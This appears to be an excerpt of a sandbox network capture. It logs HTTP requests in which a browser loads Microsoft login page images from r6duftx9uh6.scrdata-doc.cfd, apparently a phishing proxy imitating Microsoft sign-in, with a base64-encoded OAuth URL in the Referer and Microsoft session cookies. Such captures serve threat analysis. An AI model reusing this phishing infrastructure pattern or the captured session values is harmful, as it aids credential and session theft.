2024-04-26 11:21:34 UTC	2812	OUT	GET /aadcdn.msauth.net/~/shared/1.0/content/images/appbackgrounds/49_7916a894ebde7d29c2cc29b267f1299f.jpg HTTP/1.1 Host: r6duftx9uh6.scrdata-doc.cfd Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://r6duftx9uh6.scrdata-doc.cfd/?d12arvfli=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmY2xpZW50LXJlcXVlc3QtaWQ9NDdmOThkZTktYTQyMS02ODlhLTczZjAtZGQyNGViMTUxMzQxJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODQ5NzI3MjY4MjI1NzEzNC5hMzYxOTAyMS0xNWZjLTRiOTktOWY0ZS04YWJmMmQzMTM1YTImc3RhdGU9RGNzN0ZvQWdEQUJCME9keEl1UURJY2NKS3EybDF6ZkZiTGM1cGJTSExlUWFTZHA1aUNrcDlVSFVGRmxPNTQ1V0NRSGJ1a0NtR2RpU0I0YlBSVGNqTjZjYzcxSGV6OHNQ&sso_reload=true Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=4aRRMNgQQ48G; qPdM.sig=VX_p9ZlQxDGH45hp-am1FhGFA2s; ClientId=EFCB49F917AE4E1CA88B2BE99C2A2FDF; OIDC=1; OpenIdConnect.nonce.v3.9JB4ObWnOKtyZpRb76ggMLLANwVQnfEgoMR303jZyQ0=638497272682257134.a3619021-15fc-4b99-9f4e-8abf2d3135a2; X-OWA-RedirectHistory=ArLym14B7hpI-OJl3Ag; esctx-GwyRz7LSa6M=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd86j77PIMFOB6g9hYdh82rwJMsmHDcoI3LRYEPxY25z-Tqu9abNNpfAXaaQTNTAbGTlIXADbESNthkcQwqlDxKDRTgtkPhr1wfYDLBiW7Yz_RdCfucfYs8T-CRalNSnmi1ucS1ngVZ4L-cxvWU5sy6ciAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AToAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAADnfolhJpSnRYB1SVj-Hgd8zVq_c4QVv77LXu0sBzN5JoSWEmnPlEaTpKJHx-TIOCfHAFIm7A4qbYEDXjnwNt5X0w5nxTNmx2-70iJHZ6K6mPbcNpF-FvfODcs5amkEDr0gAA; esctx=PAQABBwEAAADnfolhJpSnRYB1SVj-Hgd8ty0v5DMjVd2_I3cESbvAXzAChW4-s5vW-ynxIqujloA-wDIupKgxp3BZamYAQD4EigknT1i75m8IJ1H7b5q9NavOS-4r8xIFiqVWT_36chWu_AJNyVX9xXBZ3HvzdRRUzcoMgNUbfivAsO1BgTG07VYiBshnzmSet5Du-xqgZ5IgAA; esctx-mHRmohW2y4E=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd8vT8b7tFC6DxSRJ5zbR3GMtP2zQGx9ZjMIhAjqWvrRH1gC9XNzQRHXkHwW76Wo9jv2xRkWmBKCTWq2VAhHKCBmNJy2oXms-wns56TPXYUI6fANss6_PNOhDlOOCYYeG0dht26-KjETBtSveP7qykzrSAA; fpc=Ag3Kly0IoDdBkfMWaLarS2aerOTJAQAAACmFvd0OAAAA; brcap=0
2024-04-26 11:21:35 UTC	743	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 11:21:35 GMT Content-Type: image/jpeg Content-Length: 17453 Connection: close Cache-Control: public, max-age=31536000 Last-Modified: Fri, 27 Mar 2020 19:41:47 GMT ETag: 0x8D7D286E30A1202 x-ms-request-id: 519927a5-901e-005b-34cb-97a3ba000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240426T112134Z-17859dc676bdqsl49t8q36ng64000000044g00000001w5th x-fd-int-roxy-purgeid: 4554691 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-04-26 11:21:35 UTC	15641	IN	Data Raw: ff d8 ff e1 09 50 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 34 32 20 37 39 2e 31 36 30 39 32 34 2c 20 32 30 31 37 2f 30 37 2f 31 33 2d 30 31 3a 30 36 3a 33 39 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d 6c 6e 73 3a 72 64 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 30 32 2f 32 32 2d 72 64 66 2d 73 79 6e Data Ascii: Phttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syn
2024-04-26 11:21:35 UTC	1812	IN	Data Raw: 14 40 00 00 50 00 00 04 00 00 05 00 45 00 00 05 00 00 01 00 05 50 00 00 04 00 00 05 1f ff d3 db c0 6d cd 05 45 00 00 00 04 50 1c 8a 02 00 00 00 00 04 48 aa 0e 45 15 10 00 00 00 00 00 04 82 80 90 50 10 00 04 01 44 14 51 14 10 51 11 05 01 05 40 00 00 00 00 15 40 00 00 00 40 54 50 42 28 00 00 00 00 00 00 00 02 80 00 00 00 20 00 02 a2 8a 00 00 00 00 0a 02 00 00 00 02 28 00 8a 80 00 a0 02 0a 08 a8 28 08 a0 00 02 80 a8 22 80 88 a0 2a 28 00 02 00 28 20 a2 08 28 08 00 02 88 00 0a 82 80 8a 00 00 8a 00 00 08 00 00 02 00 00 00 0a 00 a8 a8 a0 82 a2 00 00 00 8a 00 a0 02 00 02 80 20 00 00 00 00 80 00 00 22 a0 a0 20 00 2a 2a 00 02 8a 80 8a 20 82 88 00 00 00 0a 00 a0 00 00 08 02 a8 8a 02 00 28 00 80 02 80 02 00 00 02 82 2a 28 00 02 80 00 00 8a 00 02 80 00 00 20 02 80 00 Data Ascii: @PEPmEPHEPDQQ@@@TPB( (("(( ( " * (*(

Timestamp	Bytes transferred	Direction	Data
2024-04-26 11:21:34 UTC	2806	OUT	GET /aadcdn.msauth.net/~/shared/1.0/content/images/applogos/53_8b36337037cff88c3df203bb73d58e41.png HTTP/1.1 Host: r6duftx9uh6.scrdata-doc.cfd Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://r6duftx9uh6.scrdata-doc.cfd/?d12arvfli=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmY2xpZW50LXJlcXVlc3QtaWQ9NDdmOThkZTktYTQyMS02ODlhLTczZjAtZGQyNGViMTUxMzQxJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODQ5NzI3MjY4MjI1NzEzNC5hMzYxOTAyMS0xNWZjLTRiOTktOWY0ZS04YWJmMmQzMTM1YTImc3RhdGU9RGNzN0ZvQWdEQUJCME9keEl1UURJY2NKS3EybDF6ZkZiTGM1cGJTSExlUWFTZHA1aUNrcDlVSFVGRmxPNTQ1V0NRSGJ1a0NtR2RpU0I0YlBSVGNqTjZjYzcxSGV6OHNQ&sso_reload=true Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=4aRRMNgQQ48G; qPdM.sig=VX_p9ZlQxDGH45hp-am1FhGFA2s; ClientId=EFCB49F917AE4E1CA88B2BE99C2A2FDF; OIDC=1; OpenIdConnect.nonce.v3.9JB4ObWnOKtyZpRb76ggMLLANwVQnfEgoMR303jZyQ0=638497272682257134.a3619021-15fc-4b99-9f4e-8abf2d3135a2; X-OWA-RedirectHistory=ArLym14B7hpI-OJl3Ag; esctx-GwyRz7LSa6M=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd86j77PIMFOB6g9hYdh82rwJMsmHDcoI3LRYEPxY25z-Tqu9abNNpfAXaaQTNTAbGTlIXADbESNthkcQwqlDxKDRTgtkPhr1wfYDLBiW7Yz_RdCfucfYs8T-CRalNSnmi1ucS1ngVZ4L-cxvWU5sy6ciAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AToAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAADnfolhJpSnRYB1SVj-Hgd8zVq_c4QVv77LXu0sBzN5JoSWEmnPlEaTpKJHx-TIOCfHAFIm7A4qbYEDXjnwNt5X0w5nxTNmx2-70iJHZ6K6mPbcNpF-FvfODcs5amkEDr0gAA; esctx=PAQABBwEAAADnfolhJpSnRYB1SVj-Hgd8ty0v5DMjVd2_I3cESbvAXzAChW4-s5vW-ynxIqujloA-wDIupKgxp3BZamYAQD4EigknT1i75m8IJ1H7b5q9NavOS-4r8xIFiqVWT_36chWu_AJNyVX9xXBZ3HvzdRRUzcoMgNUbfivAsO1BgTG07VYiBshnzmSet5Du-xqgZ5IgAA; esctx-mHRmohW2y4E=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd8vT8b7tFC6DxSRJ5zbR3GMtP2zQGx9ZjMIhAjqWvrRH1gC9XNzQRHXkHwW76Wo9jv2xRkWmBKCTWq2VAhHKCBmNJy2oXms-wns56TPXYUI6fANss6_PNOhDlOOCYYeG0dht26-KjETBtSveP7qykzrSAA; fpc=Ag3Kly0IoDdBkfMWaLarS2aerOTJAQAAACmFvd0OAAAA; brcap=0
2024-04-26 11:21:35 UTC	735	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 11:21:35 GMT Content-Type: image/png Content-Length: 5139 Connection: close Cache-Control: public, max-age=31536000 Last-Modified: Wed, 12 Feb 2020 03:12:12 GMT ETag: 0x8D7AF695A8C44DC x-ms-request-id: e754f9e9-701e-0045-6fcb-97b185000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240426T112135Z-17949d758747rqp52ymbk602c400000008b000000000cb09 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-04-26 11:21:35 UTC	5139	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 56 00 00 00 48 08 06 00 00 00 ad 04 dd dc 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 25 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 34 38 20 37 39 2e 31 36 34 30 33 36 2c 20 32 30 31 39 2f 30 38 2f 31 33 2d 30 31 3a 30 36 3a 35 37 20 20 Data Ascii: PNGIHDRVHtEXtSoftwareAdobe ImageReadyqe<%iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57

Timestamp	Bytes transferred	Direction	Data
2024-04-26 11:21:34 UTC	2809	OUT	GET /aadcdn.msauth.net/~/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1 Host: r6duftx9uh6.scrdata-doc.cfd Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://r6duftx9uh6.scrdata-doc.cfd/?d12arvfli=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmY2xpZW50LXJlcXVlc3QtaWQ9NDdmOThkZTktYTQyMS02ODlhLTczZjAtZGQyNGViMTUxMzQxJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODQ5NzI3MjY4MjI1NzEzNC5hMzYxOTAyMS0xNWZjLTRiOTktOWY0ZS04YWJmMmQzMTM1YTImc3RhdGU9RGNzN0ZvQWdEQUJCME9keEl1UURJY2NKS3EybDF6ZkZiTGM1cGJTSExlUWFTZHA1aUNrcDlVSFVGRmxPNTQ1V0NRSGJ1a0NtR2RpU0I0YlBSVGNqTjZjYzcxSGV6OHNQ&sso_reload=true Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=4aRRMNgQQ48G; qPdM.sig=VX_p9ZlQxDGH45hp-am1FhGFA2s; ClientId=EFCB49F917AE4E1CA88B2BE99C2A2FDF; OIDC=1; OpenIdConnect.nonce.v3.9JB4ObWnOKtyZpRb76ggMLLANwVQnfEgoMR303jZyQ0=638497272682257134.a3619021-15fc-4b99-9f4e-8abf2d3135a2; X-OWA-RedirectHistory=ArLym14B7hpI-OJl3Ag; esctx-GwyRz7LSa6M=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd86j77PIMFOB6g9hYdh82rwJMsmHDcoI3LRYEPxY25z-Tqu9abNNpfAXaaQTNTAbGTlIXADbESNthkcQwqlDxKDRTgtkPhr1wfYDLBiW7Yz_RdCfucfYs8T-CRalNSnmi1ucS1ngVZ4L-cxvWU5sy6ciAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AToAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAADnfolhJpSnRYB1SVj-Hgd8zVq_c4QVv77LXu0sBzN5JoSWEmnPlEaTpKJHx-TIOCfHAFIm7A4qbYEDXjnwNt5X0w5nxTNmx2-70iJHZ6K6mPbcNpF-FvfODcs5amkEDr0gAA; esctx=PAQABBwEAAADnfolhJpSnRYB1SVj-Hgd8ty0v5DMjVd2_I3cESbvAXzAChW4-s5vW-ynxIqujloA-wDIupKgxp3BZamYAQD4EigknT1i75m8IJ1H7b5q9NavOS-4r8xIFiqVWT_36chWu_AJNyVX9xXBZ3HvzdRRUzcoMgNUbfivAsO1BgTG07VYiBshnzmSet5Du-xqgZ5IgAA; esctx-mHRmohW2y4E=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd8vT8b7tFC6DxSRJ5zbR3GMtP2zQGx9ZjMIhAjqWvrRH1gC9XNzQRHXkHwW76Wo9jv2xRkWmBKCTWq2VAhHKCBmNJy2oXms-wns56TPXYUI6fANss6_PNOhDlOOCYYeG0dht26-KjETBtSveP7qykzrSAA; fpc=Ag3Kly0IoDdBkfMWaLarS2aerOTJAQAAACmFvd0OAAAA; brcap=0
2024-04-26 11:21:35 UTC	800	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 11:21:34 GMT Content-Type: image/svg+xml Content-Length: 1435 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Fri, 17 Jan 2020 19:28:38 GMT ETag: 0x8D79B8373CB2849 x-ms-request-id: 0bcfae94-701e-003d-71c0-971b94000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240426T112134Z-17949d75874p7p6rvb4gur45440000000a20000000005pxs x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-04-26 11:21:35 UTC	1435	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 24 b5 5d 68 a5 Data Ascii: WMo7+uVHJ{&v(QFaWQ\|~\|{~b{8zv8\|bgxby{x<\lSppl7o}vtrr\|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#$]h

Timestamp	Bytes transferred	Direction	Data
2024-04-26 11:21:34 UTC	2795	OUT	GET /aadcdn.msauth.net/~/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1 Host: r6duftx9uh6.scrdata-doc.cfd Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://r6duftx9uh6.scrdata-doc.cfd/?d12arvfli=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmY2xpZW50LXJlcXVlc3QtaWQ9NDdmOThkZTktYTQyMS02ODlhLTczZjAtZGQyNGViMTUxMzQxJnByb3RlY3RlZHRva2VuPXRydWUmY2xhaW1zPSU3YiUyMmlkX3Rva2VuJTIyJTNhJTdiJTIyeG1zX2NjJTIyJTNhJTdiJTIydmFsdWVzJTIyJTNhJTViJTIyQ1AxJTIyJTVkJTdkJTdkJTdkJm5vbmNlPTYzODQ5NzI3MjY4MjI1NzEzNC5hMzYxOTAyMS0xNWZjLTRiOTktOWY0ZS04YWJmMmQzMTM1YTImc3RhdGU9RGNzN0ZvQWdEQUJCME9keEl1UURJY2NKS3EybDF6ZkZiTGM1cGJTSExlUWFTZHA1aUNrcDlVSFVGRmxPNTQ1V0NRSGJ1a0NtR2RpU0I0YlBSVGNqTjZjYzcxSGV6OHNQ&sso_reload=true Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=4aRRMNgQQ48G; qPdM.sig=VX_p9ZlQxDGH45hp-am1FhGFA2s; ClientId=EFCB49F917AE4E1CA88B2BE99C2A2FDF; OIDC=1; OpenIdConnect.nonce.v3.9JB4ObWnOKtyZpRb76ggMLLANwVQnfEgoMR303jZyQ0=638497272682257134.a3619021-15fc-4b99-9f4e-8abf2d3135a2; X-OWA-RedirectHistory=ArLym14B7hpI-OJl3Ag; esctx-GwyRz7LSa6M=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd86j77PIMFOB6g9hYdh82rwJMsmHDcoI3LRYEPxY25z-Tqu9abNNpfAXaaQTNTAbGTlIXADbESNthkcQwqlDxKDRTgtkPhr1wfYDLBiW7Yz_RdCfucfYs8T-CRalNSnmi1ucS1ngVZ4L-cxvWU5sy6ciAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA\|NoExtension; SSOCOOKIEPULLED=1; buid=0.AToAMe_N-B6jSkuT5F9XHpElWgIAAAAAAPEPzgAAAAAAAAABAAA.AQABGgEAAADnfolhJpSnRYB1SVj-Hgd8zVq_c4QVv77LXu0sBzN5JoSWEmnPlEaTpKJHx-TIOCfHAFIm7A4qbYEDXjnwNt5X0w5nxTNmx2-70iJHZ6K6mPbcNpF-FvfODcs5amkEDr0gAA; esctx=PAQABBwEAAADnfolhJpSnRYB1SVj-Hgd8ty0v5DMjVd2_I3cESbvAXzAChW4-s5vW-ynxIqujloA-wDIupKgxp3BZamYAQD4EigknT1i75m8IJ1H7b5q9NavOS-4r8xIFiqVWT_36chWu_AJNyVX9xXBZ3HvzdRRUzcoMgNUbfivAsO1BgTG07VYiBshnzmSet5Du-xqgZ5IgAA; esctx-mHRmohW2y4E=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd8vT8b7tFC6DxSRJ5zbR3GMtP2zQGx9ZjMIhAjqWvrRH1gC9XNzQRHXkHwW76Wo9jv2xRkWmBKCTWq2VAhHKCBmNJy2oXms-wns56TPXYUI6fANss6_PNOhDlOOCYYeG0dht26-KjETBtSveP7qykzrSAA; fpc=Ag3Kly0IoDdBkfMWaLarS2aerOTJAQAAACmFvd0OAAAA; brcap=0
2024-04-26 11:21:35 UTC	744	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 11:21:35 GMT Content-Type: image/x-icon Content-Length: 17174 Connection: close Cache-Control: public, max-age=31536000 Last-Modified: Sun, 18 Oct 2020 03:02:03 GMT ETag: 0x8D8731230C851A6 x-ms-request-id: 991459fd-d01e-0037-6e60-951581000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240426T112135Z-17859dc676bdqsl49t8q36ng64000000048g000000017evh x-fd-int-roxy-purgeid: 4554691 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-04-26 11:21:35 UTC	15640	IN	Data Raw: 00 00 01 00 06 00 80 80 10 00 00 00 00 00 68 28 00 00 66 00 00 00 48 48 10 00 00 00 00 00 e8 0d 00 00 ce 28 00 00 30 30 10 00 00 00 00 00 68 06 00 00 b6 36 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 1e 3d 00 00 18 18 10 00 00 00 00 00 e8 01 00 00 06 40 00 00 10 10 10 00 00 00 00 00 28 01 00 00 ee 41 00 00 28 00 00 00 80 00 00 00 00 01 00 00 01 00 04 00 00 00 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 22 50 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 Data Ascii: h(fHH(00h6 =@(A(("P"""""""""""""""""""""""""""""" 333333333333333
